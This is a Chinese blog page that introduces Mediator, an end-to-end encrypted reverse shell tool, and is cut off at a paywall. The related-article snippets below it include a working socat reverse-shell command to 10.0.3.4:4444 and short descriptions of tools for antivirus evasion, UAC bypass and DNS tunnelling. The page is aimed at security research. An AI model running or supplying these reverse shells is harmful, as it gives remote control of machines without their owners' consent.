一款功能强大,可扩展端到端加密反向Shell的工具

最新推荐文章于 2023-08-13 10:00:53 发布
最新推荐文章于 2023-08-13 10:00:53 发布
阅读量181 收藏
点赞数
分类专栏: 黑客 安全 网络 文章标签: git 网络安全 计算机网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HBohan/article/details/121744946
版权

关于Mediator

Mediator是一款功能强大的可扩展端到端加密反向Shell,该工具基于新型架构实现,采用Python语言开发,能够帮助广大研究人员通过一台“Mediator”服务器来跟Shell建立连接。这样一来,研究人员就不需要处理程序设置端口转发以侦听连接。除此之外,Mediator还可以帮助我们创建插件来扩展反向Shell的功能。

值得一提的是,我们不仅可以将Mediator的脚本作为独立的可执行文件运行,也可以将它们导入到其他渗透测试或事件响应工具中进行集成。

工具体系架构

Mediator受到了端到端加密聊天应用程序的启发,因此Mediator使用了一种独特的方法来实现反向Shell的客户端/服务器模型。Mediator使用了如下所示的方法:

客户端反向Shell

客户端Handler/Operator

一台服务器作为连接两端的桥梁

反向Shell和Handler会使用一个连接密钥来跟Mediator服务器进行连接。服务器会监听80端口(Handler连接)和443端口(反向Shell连接)。当客户端连接至Mediator服务器时,服务器将桥接这两个连接。此时,两个客户端之间将进行密钥交换,反向Shell和Operator之间的所有通信流量都将采用端到端加密,这样就可以确保不会有其他第三方窥探Mediator正在传输的流量数据。

插件机制

Mediator的插件机制将允许我们添加额外的命令,这些命令能够在研究人员的主机以及目标主机上执行各种代码。

工具下载

广大研究人员可以使用下列命令将该

最低0.47元/天 解锁文章
IT老涵
关注
专栏目录
基于深度学习的入侵检测系统设计与实现
AI天才研究院
08-06 1312
基于深度学习的入侵检测系统在提高检测精度和效率方面展现出了巨大的潜力,然而,它仍然面临着一些挑战,例如数据标准化、模型解释性、攻击的多样性等。未来,我们需要在这些方面进行更深入的研究,并开发出更强大的入侵检测系统。
反向Shell增强
aakwnam6338的博客
03-11 162
下载socat 在客户端: socat file:`tty`,raw,echo=0 tcp-listen:4444 在服务端: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 如此即可创建功能完全的反向shell 转载于:https://www.cnb...
一款基于SSH的反向Shell工具
代码讲故事
01-04 635
一款基于SSH的反向Shell工具。 Reverse_SSH上一款基于SSH的反向Shell工具,在该工具的帮助下,广大研究人员可以使用SSH来实现反向Shell,并同时拥有下列功能: 1、使用原生SSH语句管理和连接反向Shell; 2、动态、本地和远程转发; 3、原生SCP和SFTP实现,用于从目标获取文件; 4、完整功能的Windows Shell; 5、实现了客户端&服务器端身份验证,以创建高信任高可用的控制通道; 6、其他...
Shells:一款功能强大反向Shell快速生成工具
FreeBuf_的博客
12-16 515
Shells是一款功能强大反向Shell快速生成工具,该工具由4ndr34z负责开发和维护,可以帮助广大研究人员轻松生成常用的反向Shell
反向 shell 访问工具 netcat
一个软件工程师的技术笔记
03-08 665
问题 在实际开发项目中,原型产品在推向市场、实际部署使用之前,也需要在实际环境进行试验性运行,以便测试和改进。 但可能出现的一个问题是,部署测试的实际环境与办公室有一定的距离,甚至在不同的城市里。当应用服务程序异常后者挂掉的时候,就没有办法探查设备的实际情况了。 要是在办公室里,就可以基于局域网 ssh 登录访问,甚至基于调试串口登录。由于设备在远程,是无法通过 ssh 直接登录了。 基本...
快速云:简单介绍一款反向Web Shell处理工具-Shell of the Future
zyp18065271351的博客
06-14 114
分享IDC知识
Mediator:一款功能强大的可扩展端到端加密反向Shell
最新发布
dzqxwzoe的博客
08-13 44
此时,两个客户端之间将进行密钥交换,反向Shell和Operator之间的所有通信流量都将采用端到端加密,这样就可以确保不会有其他第三方窥探Mediator正在传输的流量数据。Mediator是一款功能强大的可扩展端到端加密反向Shell,该工具基于新型架构实现,采用Python语言开发,能够帮助广大研究人员通过一台“Mediator”服务器来跟Shell建立连接。Mediator受到了端到端加密聊天应用程序的启发,因此Mediator使用了一种独特的方法来实现反向Shell的客户端/服务器模型。
shell 知:外部命令
canpool
04-17 3220
文章目录1. 介绍2. 外部过滤器,程序和命令2.1. 基本命令2.1.1. ls2.1.2. cat,tac2.1.3. rev2.1.4. cp2.1.5. mv2.1.6. rm2.1.7. rmdir2.1.8. mkdir2.1.9. chmod2.1.10. chattr2.1.11. ln2.1.12. man,info2.2. 复杂命令2.2.1. find2.2.2. xargs2.2.3. expr2.3. 时间/日期命令2.3.1. date2.3.2. zdump2.3.3. tim
ToRat:ToRat是一个用Go编写的远程管理工具,使用Tor作为传输机制,使用RPC进行通信。
02-04
端到端加密 跨平台反向外壳(Windows,Linux,Mac OS) 视窗: 多个用户帐户控制绕过(特权升级) 多种持久性方法(用户,管理员) Linux: 多种持久性方法(用户,管理员) 没有Tor的可选
全国职业院校技能大赛网络建设与运维赛项赛题(一)
yuhongkui的专栏
04-30 3631
全国职业院校技能大赛网络建设与运维赛题(一)一、竞赛项目简介“网络建设与运维”竞赛共分 A.网络理论测试(从公布赛题模块一中随机抽取选择题70道,判断题30道);B.网络建设与调试;C.服务搭建与运维等三个模块。竞赛时间安排和分值权重见表1表 1 竞赛时间安排与分值权模块比赛时长分值模块一网络理论测试0.5小时10%模块二网络建设与调试6.5小时40%模块三服务搭建与运维50%合计7小时100%二、竞赛注意事项1.竞赛期间禁止携带和使用移动存储设备、计算器、通信工具及参考资料。2.请根据大赛所提供的竞赛环境
测试理论总结(一)
lwnicole_0102的博客
01-25 1754
宝贝不错,又保存了,留着慢慢消化。 1.测试流程 (1)测试需求分析(2)制定测试计划 (3)编辑测试用例 (4)审核测试用例(5)冒烟测试(6)发现bug提交bug,开发人员进行修复bug(7)回归测试并将修改完善的bug状态进行关闭 未正确修改的bug重新激活(8)编写测试报告 2.测试计划的编写要素 why----为什么进行测试 what----测试那些方面 不同阶段的工作内容 when----测试不同阶段的起止时间 where----相应文档 缺陷的存放位置 测试环境等 who-..
基于DNS的反向Shell
手牵手科技
04-19 506
Chashell是一个由Go编写的基于DNS进行通信的反向shell。它可用于绕过防火墙或严格限制的网络。 它带有一个名为chaserv的多客户端控制服务器。 chashell 通信安全 每个数据包都使用对称加密(XSalsa20 + Poly1305)进行加密,客户端和服务器之间使用共享密钥。 我们计划在未来实现非对称加密。 协议 Chashell使用Protocol Buffers序列化消息进...
ReverseTCPShell C2 反弹shell工具
sash1mi
11-21 634
ReverseTCPShell C2 反弹shell工具 ReverseTCPShell C2是一款powershell编写的反弹shell工具,流量经过AES加密,payload通过三种混淆方式可绕过一些杀软的检测。 Github下载地址:https://github.com/ZHacker13/ReverseTCPShell 1、在文件目录下启动powershell 2、.\ReverseTCP.ps1 ,启动程序 功能介绍,设置好lhost和lport(监听地址及端口) Modules (模块)
服务器被入侵了?反手溯源出入侵者画像【网络安全
热门推荐
HBohan的博客
03-07 1万+
手机上发来服务器被入侵的消息,这令人感到一脸懵,这个服务器也不是啥重要东西,上面啥也没有怎么还会被搞?被人搞了那也不能示弱了,
【内网渗透工具】炫彩蛇安装教程
HBohan的博客
11-10 7840
点击查看【学习资料】 Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper基础功能已集成杀软绕过,内网隧道,文件管理,增强命令行等基础功能. Viper通过模块的方式落地MITRE ATT&CK中的常用技术.当前已集成55个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类. Viper可以帮助你以直观/可视化的方式使用metasploit-framework. 项目地址:https://github.com/Funn
如何做好应急响应工作?常见应急响应流程
HBohan的博客
01-11 6025
1.应急响应的最终目标是保护客户的核心资产,所有行为必须围绕:保护、避害、不损害来进行。 2.在现在愈加复杂的攻击下,上述的常见场景一般会出现复合情况,需要应急人员根据经验去进行。 3.应急人员应有自己的方法论,对不同攻击的威胁建模,拥有威胁情报分析能力,结合工具的辅助进行现场响应与远程支撑。 4.工具和排查点大同小异,提升方法在于应急人员的是否熟悉该种攻击,利用特征和行为去排查更节省时间。 5.红蓝同源,应急响应属于蓝队,但必须具备一定的渗透能力。
黑客零基础入门 | 网络安全
HBohan的博客
11-11 5641
【学习资料】 导语 什么是Web安全?我又该如何入门学习它呢?学习过程中又应注意哪些问题呢?...或许你的心中有着这样的疑问、不过别着急,本文会为你一一解答这些问题。 正文 定义 Web安全,顾名思义便是由保障Web应用能够持续安全运行而衍生出的一个分支领域。 Web应用指的是一个网站的前端页面到后端服务,可以粗略的理解为一个网站及其配套的相关服务,该领域中常见的漏洞有SQL注入漏洞,XSS漏洞,CSRF漏洞等等,漏洞种类多样,趣味性强,较为适合新手入门。 下面为你介绍Web安全方面的常.
网络安全】什么是XXE?从0到1完全掌握XXE
HBohan的博客
04-28 5394
前置知识 XML 定义实体 XML 实体允许定义在分析 XML 文档时将由内容替换的标记,这里我的理解就是定义变量,然后赋值的意思一致。就比如一些文件上传的 payload 中就会有。 XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的,他就是长得下面这个样子 <?xml version="1.0"?>//这一行是 XML 文档定义 <!DOCTYPE message [ <!ELEMENT messa
移动通信系统端到端加密协议与密钥管理机制设计
移动通信系统为了提升安全性,迫切需要支持端到端加密功能,尤其是对于GSM系统,其话音传输过程中的压缩语音编解码使得加密语音难以在保持无损的情况下在终端间传输,这为在语音信道上实施端到端加密带来了挑战。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值